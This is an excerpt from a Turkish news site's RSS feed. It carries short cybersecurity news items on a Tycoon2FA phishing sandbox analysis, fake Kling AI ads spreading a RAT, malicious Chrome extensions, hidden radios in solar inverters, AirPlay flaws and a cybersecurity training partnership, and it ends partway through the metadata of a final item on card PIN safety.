<p data-start="476" data-end="882"><strong data-start="476" data-end="533">Kimlik Avı Saldırıları Neden Hâlâ Bu Kadar Tehlikeli?</strong><br data-start="533" data-end="536">Günümüzde tek bir dikkatle hazırlanmış e-posta, tüm bir sistemin güvenliğini tehlikeye atabiliyor. Kurumsal e-posta filtrelerini aşabilen bu iletiler, çalışanları kandırarak saldırganlara sistemlere erişim sağlayabiliyor. Özellikle Tycoon2FA gibi gelişmiş kimlik avı araçları, otomatik analiz çözümleriyle tespit edilmesi zor hale gelmiş durumda.</p>
<p data-start="884" data-end="1293"><strong data-start="884" data-end="941">İlk Adım: Şüpheli Ögeleri Sandbox Ortamında İncelemek</strong><br data-start="941" data-end="944">SOC (Güvenlik Operasyon Merkezi) ekipleri, şüpheli dosya veya URL’leri ANY.RUN gibi etkileşimli sanal alan ortamlarına yükleyerek analiz gerçekleştirebiliyor. Bu tür sanal makineler, dosyaların açılmasını, bağlantıların tıklanmasını ve davranışların gözlemlenmesini güvenli şekilde sağlıyor. ANY.RUN, bu analizleri dakikalar içinde tamamlayabiliyor.</p>
<p data-start="1295" data-end="1781"><strong data-start="1295" data-end="1355">Gerçek Bir Örnek: Tycoon2FA E-postasıyla Yapılan Saldırı</strong><br data-start="1355" data-end="1358">Analiz edilen örnek e-posta, kullanıcıyı kandırmak amacıyla içine büyük, yeşil bir ‘Ses Çal’ butonu yerleştirilmiş bir tasarım içeriyor. Butona tıklanması, kullanıcıyı CAPTCHA’lı başka sayfalara yönlendiriyor. Bu aşamada birçok otomatik sistem devre dışı kalıyor. Ancak ANY.RUN ortamında manuel veya otomatik CAPTCHA çözümü ile analiz devam ettirilebiliyor ve nihai hedef olan sahte Microsoft giriş ekranına ulaşılabiliyor.</p>
<p data-start="1783" data-end="2172"><strong data-start="1783" data-end="1837">İkinci Adım: Tüm Saldırı Zincirini Görselleştirmek</strong><br data-start="1837" data-end="1840">Etkileşimli analiz sayesinde saldırının her aşaması detaylı şekilde izlenebiliyor. Şüpheli yönlendirmeler, kimlik avı ekranları ve kullanıcı davranışlarını taklit eden mekanizmalar açıkça gözlemlenebiliyor. Otomatik araçların kaçırabileceği ipuçları — örneğin eksik favicon, alakasız URL yapısı — manuel analizle ortaya çıkarılıyor.</p>
<p data-start="2174" data-end="2589"><strong data-start="2174" data-end="2234">Üçüncü Adım: IOC’leri Toplamak ve Güvenliği Güçlendirmek</strong><br data-start="2234" data-end="2237">Tamamlanan analiz sonrasında elde edilen IOC’ler (kompromize göstergeleri), tehdit önleme sistemlerine entegre edilebiliyor. ANY.RUN aracı, zararlı süreçleri, şüpheli ağ bağlantılarını, IP’leri ve domainleri anında işaretleyerek kapsamlı bir rapor oluşturuyor. Bu veriler hem mevcut saldırıya karşı hem de gelecekteki tehditlere karşı kullanılabiliyor.</p>
<p data-start="2591" data-end="2995"><strong data-start="2591" data-end="2645">Etkileşimli Sandbox Kullanmanın Kurumsal Faydaları</strong><br data-start="2645" data-end="2648">Etkileşimli sanal alan çözümleri, yalnızca deneyimli güvenlik ekipleri için değil, yeni başlayan analistler için de uygun bir analiz ortamı sunuyor. Eğitim, olay yanıtı, tehdit tespiti ve işbirliği açısından birçok avantaj sağlıyor. Bulut tabanlı yapısı sayesinde altyapı kurulumu gerektirmeyen sistem, her yerden analiz yapılmasına imkân tanıyor.</p>
<p data-start="2997" data-end="3262"><strong data-start="2997" data-end="3023">Özel Kampanya Duyurusu</strong><br data-start="3023" data-end="3026">ANY.RUN, 19-31 Mayıs 2025 tarihleri arasında 9. kuruluş yılını özel kampanyalarla kutluyor. Sandbox lisansları, tehdit istihbarat araçları ve eğitim laboratuvarları için geçerli tekliflerle kurumlar, analiz kapasitelerini artırabilecek.</p>
<p data-start="3264" data-end="3412"><strong data-start="3264" data-end="3276"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Sahte Kling AI Reklamları Facebook’ta 22 Milyon Kişiyi Hedef Alan Zararlı Yazılım Dağıttı</title>
<link>https://www.ajansexpres.com.tr/sahte-kling-ai-reklamlari-facebookta-22-milyon-kisiyi-hedef-alan-zararli-yazilim-dagitti</link>
<guid>https://www.ajansexpres.com.tr/sahte-kling-ai-reklamlari-facebookta-22-milyon-kisiyi-hedef-alan-zararli-yazilim-dagitti</guid>
<description><![CDATA[ Facebook&#039;ta sahte Kling AI temalı sponsorlu reklamlarla yayılan yeni bir siber saldırı kampanyası, kullanıcıları sahte web sitelerine yönlendirerek uzaktan erişim Truva Atı (RAT) yüklemelerine neden oldu. Kampanya, 22 milyondan fazla potansiyel kurbanı hedef aldı ve Vietnam bağlantılı siber suçlularla ilişkilendiriliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948463eadb1.webp" length="27946" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:03 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Sahte Kling AI reklamları nasıl çalışıyor, PureHVNC RAT nedir, Facebook üzerindeki zararlı yazılım kampanyası kimlerle bağlantılı, bu saldırıdan kimler etkileniyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="464" data-end="467"><strong data-start="467" data-end="521">Facebook'ta sahte reklamlarla yayılan siber tehdit</strong><br data-start="521" data-end="524">Sosyal medya platformu Facebook, sahte Kling AI temalı sponsorlu reklamlarla başlatılan geniş çaplı bir siber saldırı kampanyasına sahne oldu. Sahte Facebook sayfaları ve yanıltıcı içeriklerle oluşturulan reklamlar, kullanıcıları Kling AI gibi görünen sahte internet sitelerine yönlendirdi. Bu sahte sitelerde kurbanlara görüntü veya video üretme vaadiyle kötü amaçlı yazılım yüklemeleri sağlandı.</p>
<p></p>
<p data-start="923" data-end="1491"><strong data-start="923" data-end="971">Kling AI üzerinden yapılan kimlik hırsızlığı</strong><br data-start="971" data-end="974">Gerçekte Çin merkezli Kuaishou Technology tarafından geliştirilen Kling AI, yapay zeka destekli bir içerik üretim platformudur ve 2025 itibarıyla 22 milyondan fazla kullanıcıya sahiptir. Ancak saldırganlar, bu popülerliğin arkasına saklanarak Kling AI'yı taklit eden sahte web siteleri (örneğin <em data-start="1269" data-end="1289">klingaimedia[.]com</em>, <em data-start="1291" data-end="1312">klingaistudio[.]com</em>) kurdu. Bu siteler, kullanıcılara dosya indirmelerini önerdi. İndirilen dosyalar, içinde uzaktan erişim Truva Atı (RAT) ve bilgi hırsızlarını barındıran ZIP arşivleri içeriyordu.</p>
<p data-start="1493" data-end="1987"><strong data-start="1493" data-end="1532">PureHVNC RAT ile sistemlere sızıldı</strong><br data-start="1532" data-end="1535">Check Point'in tespitine göre, kurbanların bilgisayarlarına indirilen yükleyici dosyalar, çeşitli güvenlik analiz araçlarını algılayabiliyor ve Windows Kayıt Defteri üzerinde değişiklik yaparak sistemde kalıcılığını sağlıyor. Ayrıca meşru sistem süreçlerine sızarak, PureHVNC RAT adlı ikinci aşama zararlı yazılımı aktive ediyor. Bu yazılım, tarayıcı verilerini, kripto cüzdan bilgilerini ve ekran görüntülerini hedef alarak hassas verileri sızdırıyor.</p>
<p data-start="1989" data-end="2423"><strong data-start="1989" data-end="2036">Vietnam bağlantısı ve yaygınlaşan taktikler</strong><br data-start="2036" data-end="2039">Check Point araştırmacıları, sahte Kling AI sayfalarına ait en az 70 farklı tanıtım gönderisi tespit ettiklerini duyurdu. Kampanyayı yürüten kişi veya grupların kimliği netleşmemekle birlikte, deliller Vietnam merkezli siber suçlulara işaret ediyor. Bu tür grupların, daha önce de sahte yapay zeka araçları aracılığıyla kullanıcıları zararlı yazılım indirmeye teşvik ettiği biliniyor.</p>
<p data-start="2425" data-end="2872"><strong data-start="2425" data-end="2471">Sosyal medya tabanlı saldırılar yükselişte</strong><br data-start="2471" data-end="2474">The Wall Street Journal’a göre, Meta platformlarında son dönemde büyük bir dolandırıcılık artışı yaşanıyor. Facebook ve Instagram, romantik dolandırıcılıklardan sahte promosyonlara kadar çeşitli siber suçlara ev sahipliği yapıyor. Ayrıca, Telegram ve benzeri platformlar üzerinden yayılan sahte iş ilanları, genç bireyleri Güneydoğu Asya’daki dolandırıcılık ağlarına yönlendirmek için kullanılıyor.</p>
<p data-start="2874" data-end="3054"><strong data-start="2874" data-end="2886"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Mobil Kullanıcıları Hedef Alan Sahte PWA Yönlendirmesiyle Yetişkin İçerikli Dolandırıcılık Tespit Edildi</title>
<link>https://www.ajansexpres.com.tr/mobil-kullanicilari-hedef-alan-sahte-pwa-yoenlendirmesiyle-yetiskin-icerikli-dolandiricilik-tespit-edildi</link>
<guid>https://www.ajansexpres.com.tr/mobil-kullanicilari-hedef-alan-sahte-pwa-yoenlendirmesiyle-yetiskin-icerikli-dolandiricilik-tespit-edildi</guid>
<description><![CDATA[ Siber güvenlik araştırmacıları, mobil cihaz kullanıcılarını sahte uygulama mağazalarına yönlendiren kötü amaçlı JavaScript enjeksiyonları içeren yeni bir dolandırıcılık kampanyasını ortaya çıkardı. Saldırı, özellikle mobil tarayıcılarda çalışan sahte bir İleri Web Uygulaması (PWA) ile gerçekleştiriliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894845eddfab.webp" length="53150" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:58 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>PWA dolandırıcılığı nasıl çalışıyor, saldırılar hangi cihazları hedef alıyor, yönlendirme hangi yöntemle yapılıyor, kullanıcılar nasıl korunabilir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="462" data-end="465"><strong data-start="465" data-end="527">Mobil kullanıcıları hedefleyen yeni dolandırıcılık yöntemi</strong><br data-start="527" data-end="530">Siber güvenlik uzmanları, mobil cihazlarda site ziyaretçilerini yetişkin içerikli dolandırıcılık sitelerine yönlendirmek amacıyla kullanılan kötü amaçlı JavaScript enjeksiyonları içeren yeni bir siber saldırı kampanyasını ortaya çıkardı.</p>
<p></p>
<p data-start="770" data-end="1053">c/side araştırmacısı Himanshu Anand tarafından Salı günü yayımlanan analizde, saldırının dikkat çeken yönünün kullanılan teslimat yöntemi olduğu belirtildi. Anand, 'Yükün kendisi yeni bir şey değil (bir başka yetişkin kumar dolandırıcılığı), ancak teslimat yöntemi öne çıkıyor' dedi.</p>
<p data-start="1055" data-end="1467"><strong data-start="1055" data-end="1114">Tam işlevli PWA ile sahte uygulama mağazası simülasyonu</strong><br data-start="1114" data-end="1117">Saldırıda kullanılan kötü amaçlı açılış sayfasının, tam teşekküllü bir İleri Web Uygulaması (PWA) olduğu ve kullanıcıların daha uzun süre etkileşimde kalmasını sağlamak ile temel tarayıcı korumalarını aşmayı hedeflediği ifade edildi. Bu yöntemle saldırganlar, mobil cihaz kullanıcılarını tespit ederek özel olarak mobil odaklı bir saldırı düzenliyor.</p>
<p data-start="1469" data-end="1884"><strong data-start="1469" data-end="1518">Yalnızca mobilde çalışan JavaScript saldırısı</strong><br data-start="1518" data-end="1521">Kampanya, yalnızca mobil cihazlarda tetiklenen istemci tarafı JavaScript saldırısı olarak tanımlandı. JavaScript kodu, belirli web sitelerine enjekte edilerek çalışıyor ve Android, iOS ve iPadOS kullanıcılarını yönlendirme sayfalarına taşıyor. Bu yönlendirme sayfaları, kullanıcıları yetişkin içerikli sahte uygulamaların reklamını yapan bağlantılara ulaştırıyor.</p>
<p data-start="1886" data-end="2316"><strong data-start="1886" data-end="1942">PWA’lar yeni kimlik avı stratejilerinde kullanılıyor</strong><br data-start="1942" data-end="1945">PWA’lar, web teknolojileri kullanılarak geliştirilen ve kullanıcıya yerel uygulama benzeri bir deneyim sunan yapılar olmaları nedeniyle saldırganlar için cazip hale geliyor. Anand, 'PWA'ların kullanımı, saldırganların daha kalıcı kimlik avı yöntemlerini denediğini gösteriyor. Sadece mobil odaklı olmaları, birçok tespit mekanizmasından kaçmalarına olanak sağlıyor' dedi.</p>
<p data-start="2318" data-end="2481"><strong data-start="2318" data-end="2330"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Chrome Mağazasında Tespit Edilen 100&amp;apos;den Fazla Sahte Uzantı Oturumları Ele Geçiriyor</title>
<link>https://www.ajansexpres.com.tr/chrome-magazasinda-tespit-edilen-100den-fazla-sahte-uzanti-oturumlari-ele-geciriyor</link>
<guid>https://www.ajansexpres.com.tr/chrome-magazasinda-tespit-edilen-100den-fazla-sahte-uzanti-oturumlari-ele-geciriyor</guid>
<description><![CDATA[ Şubat 2024&#039;ten bu yana tespit edilen 100&#039;den fazla sahte Chrome uzantısı, kullanıcıların oturumlarını ele geçiriyor, kimlik bilgilerini çalıyor ve tarayıcılara reklam enjekte ediyor. Uzantılar meşru hizmetleri taklit ederek kullanıcıları kandırıyor ve güvenlik açıklarından faydalanarak zararlı işlemler yürütüyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894845b1d368.webp" length="10102" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:54 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Sahte Chrome uzantıları nasıl çalışıyor, hangi hizmetler taklit ediliyor, kullanıcılar nasıl korunabilir, Google hangi önlemleri aldı</media:keywords>
<content:encoded><![CDATA[<p data-start="437" data-end="874"><strong data-start="458" data-end="513">Sahte Chrome uzantıları kullanıcıları tehdit ediyor</strong><br data-start="513" data-end="516">DomainTools Intelligence (DTI) ekibinin tespitlerine göre, Şubat 2024'ten bu yana Chrome Web Mağazası’nda görünüşte zararsız gibi görünen ancak arka planda ciddi güvenlik riskleri barındıran çok sayıda uzantı yayınlandı. Bu uzantılar, kullanıcıların oturum bilgilerini ele geçiriyor, çerezleri topluyor ve tarayıcılar üzerinden kötü amaçlı reklamlar yayıyor.</p>
<p data-start="876" data-end="1238"><strong data-start="876" data-end="923">Kötü niyetli uzantılar aşırı izinler alıyor</strong><br data-start="923" data-end="926">Kötü amaçlı eklentiler, manifest.json dosyaları aracılığıyla kendilerine geniş kapsamlı izinler tanıyor. Bu sayede tarayıcıda ziyaret edilen her siteyle etkileşim kurabiliyor, saldırganın kontrolündeki etki alanlarından zararlı komutlar alıp çalıştırabiliyor ve kullanıcıyı istenmeyen sitelere yönlendirebiliyor.</p>
<p data-start="1240" data-end="1661"><strong data-start="1240" data-end="1287">Meşru hizmetleri taklit ederek yayılıyorlar</strong><br data-start="1287" data-end="1290">Uzantıların dağıtımı, DeepSeek, Manus, DeBank, FortiVPN ve Site Stats gibi bilinen hizmetleri taklit eden sahte web siteleri üzerinden gerçekleştiriliyor. Bu siteler, kullanıcılara sahte uzantıları yükletmek için meşruymuş gibi tasarlanıyor. Uzantılar ayrıca, DOM üzerindeki "onreset" olay işleyicisi aracılığıyla içerik güvenlik politikalarını (CSP) atlatmaya çalışıyor.</p>
<p data-start="1663" data-end="2004"><strong data-start="1663" data-end="1708">Facebook araçları da kullanılmış olabilir</strong><br data-start="1708" data-end="1711">DTI ekibi, saldırganların kullanıcıları sahte uzantılara yönlendirmek için sosyal medya platformlarını da kullandığını düşünüyor. Bazı sahte sitelerin Facebook izleme kimlikleri içerdiği ve kullanıcı çekmek amacıyla Facebook sayfaları, grupları ve reklamlarının kullanıldığı değerlendiriliyor.</p>
<p data-start="2006" data-end="2372"><strong data-start="2006" data-end="2054">Google harekete geçti, kullanıcılar uyarıldı</strong><br data-start="2054" data-end="2057">Tespit edilen kötü amaçlı uzantılar, Google tarafından Chrome Web Mağazası’ndan kaldırıldı. Ancak uzmanlar, kullanıcıların hâlâ dikkatli olmaları gerektiğini belirtiyor. Uzantı yüklemeden önce geliştiricilerin doğrulanması, izinlerin kontrol edilmesi ve kullanıcı yorumlarının dikkatle incelenmesi tavsiye ediliyor.</p>
<p data-start="2374" data-end="2706"><strong data-start="2374" data-end="2409">Manipülasyon riski devam ediyor</strong><br data-start="2409" data-end="2412">DomainTools'un bulgularına göre, bazı uzantılar kullanıcı puanlamalarını manipüle etmek amacıyla düşük puan veren kullanıcıları özel geri bildirim formlarına yönlendirirken, yüksek puan verenleri doğrudan Chrome Mağazası'na yönlendiriyor. Bu da, değerlendirmelerin güvenilirliğini sorgulatıyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Çin menşeli güneş panellerinde gizli donanım şüphesi: ABD&amp;apos;de casusluk alarmı</title>
<link>https://www.ajansexpres.com.tr/cin-menseli-gunes-panellerinde-gizli-donanim-suphesi-abdde-casusluk-alarmi</link>
<guid>https://www.ajansexpres.com.tr/cin-menseli-gunes-panellerinde-gizli-donanim-suphesi-abdde-casusluk-alarmi</guid>
<description><![CDATA[ ABD’de kullanılan bazı Çin yapımı güneş enerjisi ekipmanlarında gizlenmiş iletişim aygıtları tespit edildi. Bu parçaların sistemleri uzaktan kontrol etme amacıyla yerleştirilmiş olabileceği iddiası, enerji güvenliği açısından ciddi endişelere yol açtı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484564d530.webp" length="35516" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:50 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Çinli güneş paneli üreticileri hangi sistemleri etkiliyor, gizli iletişim donanımları ne amaçla yerleştiriliyor, ABD güvenlik güçleri olaya nasıl yaklaşıyor, Çin yönetimi iddialara ne yanıt verdi</media:keywords>
<content:encoded><![CDATA[<p><br data-start="381" data-end="384"><strong data-start="384" data-end="424">Güneş enerjisinde gizli risk iddiası</strong><br data-start="424" data-end="427">Küresel çapta temiz enerjiye geçiş hız kazanırken, ABD ile Çin arasında teknoloji temelli yeni bir güvenlik krizi gündeme geldi. Reuters’ın yayımladığı kapsamlı araştırma, ABD’de kullanılan bazı güneş enerjisi sistemlerinde belgelenmemiş iletişim aygıtları bulunduğunu ortaya koydu. Bu cihazların, Çinli üreticiler tarafından sistemlere kasıtlı olarak yerleştirilmiş olabileceği ileri sürüldü.</p>
<p></p>
<p data-start="822" data-end="1243"><strong data-start="822" data-end="878">Sistemlere entegre edilen gizli iletişim donanımları</strong><br data-start="878" data-end="881">İddialara göre, Çin menşeli bazı güneş invertörleri ve batarya sistemlerinde hücresel iletişim donanımları yer aldı. Bu sistemler, enerjiyi şebekeye aktaran ve depolayan temel ekipmanlar arasında yer alıyor. Uzmanlara göre, bu donanımlar kötü niyetli kişiler tarafından uzaktan devre dışı bırakılabilir ve bu da geniş çaplı elektrik kesintilerine neden olabilir.</p>
<p data-start="1245" data-end="1535"><strong data-start="1245" data-end="1302">Kasım 2024’te sinyal müdahalesi yaşandığı öne sürüldü</strong><br data-start="1302" data-end="1305">Reuters’ın haberinde, Kasım 2024’te bazı invertörlerin Çin'den gelen sinyallerle uzaktan kapatıldığı vakalar bildirildi. Vakaların tüm etkisi henüz netleşmese de, yetkililer arasında ciddi güvenlik endişeleri doğurduğu belirtildi.</p>
<p data-start="1537" data-end="1907"><strong data-start="1537" data-end="1574">Belgelerde yer almayan bileşenler</strong><br data-start="1574" data-end="1577">Güneş sistemlerinde uzaktan erişim ve performans izleme için iletişim modülleri standart hale gelmiş durumda. Ancak uzmanların dikkat çektiği nokta, bu bileşenlerin hiçbir teknik belgede belirtilmemiş olması. Bu durum, sistemlerin siber güvenlik önlemlerine entegre edilmemesine ve dış müdahalelere açık hale gelmesine yol açıyor.</p>
<p data-start="1909" data-end="2165"><strong data-start="1909" data-end="1942">ABD Enerji Bakanlığı uyarıyor</strong><br data-start="1942" data-end="1945">ABD Enerji Bakanlığı sözcüsü, “Bu işlevsellik kötü niyetli olmayabilir, ancak satın alanların ürünlerin tam özelliklerini bilmesi gerekir” diyerek, belgelenmemiş donanımların güvenlik açıkları oluşturduğuna dikkat çekti.</p>
<p data-start="2167" data-end="2449"><strong data-start="2167" data-end="2195">Çin iddiaları reddediyor</strong><br data-start="2195" data-end="2198">Olayda adı geçen Çinli firmaların sayısı netleşmezken, Çin’in Washington Büyükelçiliği iddiaları reddetti. Yapılan açıklamada, ‘ulusal güvenlik kavramının genelleştirilmesine ve Çin’in teknoloji başarılarının karalanmasına’ karşı çıkıldığı belirtildi.</p>
<p data-start="2451" data-end="2782"><strong data-start="2451" data-end="2494">ABD’de Çin menşeli ekipman oranı yüksek</strong><br data-start="2494" data-end="2497">Enerji danışmanlığı şirketi Wood Mackenzie’nin verilerine göre, dünyadaki güneş invertörlerinin yüzde 78’i Çin üretimi. ABD’deki güneş paneli üretim kapasitesinin yüzde 39’u da Çinli firmalara ait. Bu durum, ABD enerji altyapısının Çin’e olan yüksek bağımlılığını gözler önüne seriyor.</p>
<p data-start="2784" data-end="2996"><strong data-start="2784" data-end="2796"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Suudi Arabistan’da Siber Güvenlik Eğitimine Yeni Dönem: INE Security ile Abadnet İş Birliği Başladı</title>
<link>https://www.ajansexpres.com.tr/suudi-arabistanda-siber-guvenlik-egitimine-yeni-doenem-ine-security-ile-abadnet-is-birligi-basladi</link>
<guid>https://www.ajansexpres.com.tr/suudi-arabistanda-siber-guvenlik-egitimine-yeni-doenem-ine-security-ile-abadnet-is-birligi-basladi</guid>
<description><![CDATA[ Siber güvenlik alanında küresel liderlerden INE Security, Suudi Arabistan merkezli Abadnet Institute ile kapsamlı bir eğitim ortaklığına imza attı. Ortaklık sayesinde bölgedeki öğrencilere uluslararası akredite, uygulamalı siber güvenlik eğitimleri sunulacak. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948451da8a5.webp" length="28282" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:45 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>INE Security ve Abadnet iş birliği neleri kapsıyor, Suudi Arabistanda kaç öğrenci bu programdan yararlanacak, eJPT eğitimi nedir, Abadnet Institute hangi sertifikaları veriyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="411" data-end="414">Cary, Kuzey Karolina merkezli siber güvenlik eğitim firması INE Security, Riyad'da faaliyet gösteren Abadnet Institute for Training ile stratejik bir ortaklık kurduğunu duyurdu. İş birliği, INE Security'nin dünya çapında tanınan eğitim materyalleri ile Abadnet'in bölgesel uzmanlığını bir araya getirerek Suudi Arabistan ve çevresinde nitelikli siber güvenlik profesyonelleri yetiştirmeyi hedefliyor.</p>
<p></p>
<p data-start="816" data-end="1287"><strong data-start="816" data-end="860">Uluslararası akredite eğitim programları</strong><br data-start="860" data-end="863">2007 yılında kurulan Abadnet Institute, yıllık 10.000'den fazla öğrenciye hizmet veren, uluslararası akredite programlarıyla dikkat çeken bir eğitim kuruluşu. Ortaklık kapsamında INE Security, Abadnet’in eğitim kamplarını Junior Penetration Tester (eJPT) içeriği, uygulamalı laboratuvarlar ve CompTIA Security+ gibi sertifika hazırlıkları ile destekliyor. Bu sayede öğrencilere hem teorik hem de uygulamalı eğitim sunulacak.</p>
<p data-start="1289" data-end="1737"><strong data-start="1289" data-end="1318">İlk akademi tamamen doldu</strong><br data-start="1318" data-end="1321">Yeni iş birliği, 200 öğrencilik ilk akademiyle başladı ve tüm lisans kontenjanları tamamen doldu. INE Security Baş Gelir Sorumlusu Brett Erskine, yapılan açıklamada şu ifadeleri kullandı: ‘Suudi Arabistan ve GCC bölgesinde güçlü bir üne sahip olan Abadnet ile çalışmaktan heyecan duyuyoruz. Bu ortaklık, öğrencilere pratik beceriler ve sektörel sertifikalar sunarak kariyerlerinde önemli bir sıçrama imkanı veriyor.’</p>
<p data-start="1739" data-end="2240"><strong data-start="1739" data-end="1797">Abadnet, INE içerikleriyle eğitim kalitesini artırıyor</strong><br data-start="1797" data-end="1800">Abadnet Institute Operasyon Direktörü Ahmed Alkathiri, INE Security’nin içerik kalitesine dikkat çekerek şunları söyledi: ‘INE’nin eğitim materyalleri kariyerim boyunca bana büyük katkı sağladı. Bu ortaklık sayesinde öğrencilerimize en ileri düzeyde eğitim verebilme kapasitemizi artırıyoruz.’ Abadnet Siber Güvenlik Bölüm Başkanı Ahmed Fatouh ise, INE içeriklerinin eğitim müfredatına entegre edilmesinin önemli bir adım olduğunu belirtti.</p>
<p data-start="2242" data-end="2577"><strong data-start="2242" data-end="2268">Gelecek odaklı yatırım</strong><br data-start="2268" data-end="2271">Bu iş birliği, INE Security’nin bölgedeki dijital istihdam ekosistemini güçlendirme ve yüksek nitelikli siber güvenlik uzmanları yetiştirme hedefinin bir parçası olarak değerlendiriliyor. Ortaklık sayesinde, penetrasyon testi ve etik hackleme gibi alanlarda işe hazır yetenekler geliştirilmesi amaçlanıyor.</p>
<p data-start="2579" data-end="2774"><strong data-start="2579" data-end="2591"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>iPhone&amp;apos;lar AirPlay açığıyla tehdit altında: Uzaktan hack riski büyüyor</title>
<link>https://www.ajansexpres.com.tr/iphonelar-airplay-acigiyla-tehdit-altinda-uzaktan-hack-riski-buyuyor</link>
<guid>https://www.ajansexpres.com.tr/iphonelar-airplay-acigiyla-tehdit-altinda-uzaktan-hack-riski-buyuyor</guid>
<description><![CDATA[ Apple, &#039;AirBorne&#039; adı verilen kritik bir güvenlik açığı nedeniyle iPhone kullanıcılarını uyardı. AirPlay özelliğinde keşfedilen 23&#039;e yakın açık, sıfır tıklama saldırılarıyla cihazların ele geçirilmesine yol açabiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894844d725f9.webp" length="19832" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:41 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>iPhone AirPlay açığı nedir, sıfır tıklama saldırısı ne anlama geliyor, Apple kullanıcılarından ne yapmalarını istiyor, AirPlay özelliği nasıl devre dışı bırakılır</media:keywords>
<content:encoded><![CDATA[<p data-start="315" data-end="638"><strong data-start="332" data-end="369">Apple'dan kritik güvenlik uyarısı</strong><br data-start="369" data-end="372">Teknoloji şirketi Apple, iPhone kullanıcılarını doğrudan etkileyen önemli bir güvenlik açığı hakkında açıklamada bulundu. Şirketin uyarısına göre, AirPlay özelliğinde tespit edilen kritik açıklar, kullanıcıların cihazlarını siber saldırılara açık hale getirebiliyor.</p>
<p data-start="640" data-end="994"><strong data-start="640" data-end="673">23'e yakın açık tespit edildi</strong><br data-start="673" data-end="676">Siber güvenlik firması Oligo tarafından yapılan araştırmada, Apple'ın AirPlay protokolünde 23 farklı güvenlik açığı bulunduğu belirlendi. Bu açıkların büyük kısmının, üçüncü taraf üreticilerin AirPlay ile uyumlu hale getirdiği cihazlarda kullanılan AirPlay Yazılım Geliştirme Kiti (SDK) içinde yer aldığı ifade edildi.</p>
<p data-start="996" data-end="1459"><strong data-start="996" data-end="1057">Cihazlar kullanıcı etkileşimi olmadan ele geçirilebiliyor</strong><br data-start="1057" data-end="1060">Oligo'nun CTO'su Gal Elbaz, keşfedilen açıkların 'sıfır tıklama' (zero-click) saldırılarına olanak sağladığını belirtti. Bu durum, siber korsanların kullanıcı herhangi bir işlem yapmadan cihazlara sızmasına, kötü amaçlı yazılım yüklemesine veya veri çalmasına neden olabiliyor. Açıkların çoğu zaman yamanmasının zor olduğu, bazı cihazlarda ise bu yamaların hiçbir zaman yapılmayabileceği vurgulandı.</p>
<p data-start="1461" data-end="1804"><strong data-start="1461" data-end="1500">Apple’dan alınması gereken önlemler</strong><br data-start="1500" data-end="1503">Apple, bu güvenlik risklerini azaltmak amacıyla kullanıcıların cihazlarını acilen en son iOS sürümüne güncellemelerini ve AirPlay özelliğini devre dışı bırakmalarını öneriyor. Ayrıca, AirPlay üzerinden yalnızca güvenilir kişilerden dosya alınması da önemli bir güvenlik adımı olarak değerlendiriliyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Milyonların Yaptığı Şifre Hataları Kartları Tehlikeye Atıyor: Bu Rakamları Sakın Kullanmayın</title>
<link>https://www.ajansexpres.com.tr/milyonlarin-yaptigi-sifre-hatalari-kartlari-tehlikeye-atiyor-bu-rakamlari-sakin-kullanmayin</link>
<guid>https://www.ajansexpres.com.tr/milyonlarin-yaptigi-sifre-hatalari-kartlari-tehlikeye-atiyor-bu-rakamlari-sakin-kullanmayin</guid>
<description><![CDATA[ Kredi kartı kullanımının arttığı günümüzde, basit ve tahmin edilebilir şifreler kullanıcıları dolandırıcılara karşı savunmasız bırakıyor. Uzmanlar, &#039;1234&#039; ve doğum yılı gibi rakamların şifrelerde kesinlikle yer almaması gerektiğini vurguluyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948448dda32.webp" length="22044" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:36 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Kart şifresi seçerken hangi hatalar yapılıyor, en riskli şifre kombinasyonları hangileri, şifre güvenliği için uzmanlar ne öneriyor, otomatik yazılımlar nasıl çalışıyor</media:keywords>
